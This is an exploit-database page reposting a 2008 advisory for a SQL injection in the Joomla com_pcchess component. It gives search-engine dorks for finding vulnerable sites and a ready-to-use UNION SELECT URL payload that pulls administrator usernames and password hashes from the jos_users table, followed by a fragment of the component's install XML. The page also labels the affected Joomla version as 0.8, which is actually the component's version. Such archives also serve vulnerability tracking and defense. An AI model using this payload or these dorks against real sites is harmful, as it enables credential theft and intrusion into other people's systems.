header-logo
Suggest Exploit
vendor:
Joomla
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_pcchess)

An attacker can exploit a SQL injection vulnerability in the com_pcchess component of Joomla! to gain access to the username and password of the administrator. The vulnerable parameter is the ‘user_id’ parameter which is passed to the ‘index.php’ script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. The malicious SQL statement can be used to extract the username and password of the administrator from the ‘jos_users’ table.

Mitigation:

Upgrade to the latest version of Joomla! and ensure that all components are up to date.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_pcchess)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl: com_pcchess "user_id"
#
# DORK 2 : allinurl: com_pcchess
#
#########################################################################
EXPLOIT :

index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

#########################################################################
# S@BUN    i AM NOT HACKER    S@BUN
#########################################################################

<mosinstall type="component">
 <name>pcchess</name>
 <creationDate>08/20/2005</creationDate>
 <author>Robert Prince</author>
 <copyright>This component copyright Robert J. Prince, released under the GNU/GPL License</copyright>
 <authorEmail>rob@princeclan.org</authorEmail>

 <authorUrl>www.princeclan.org</authorUrl>
 <version>0.8</version>

# milw0rm.com [2008-02-12]

Navigation

Suggest Exploit

Services By CQR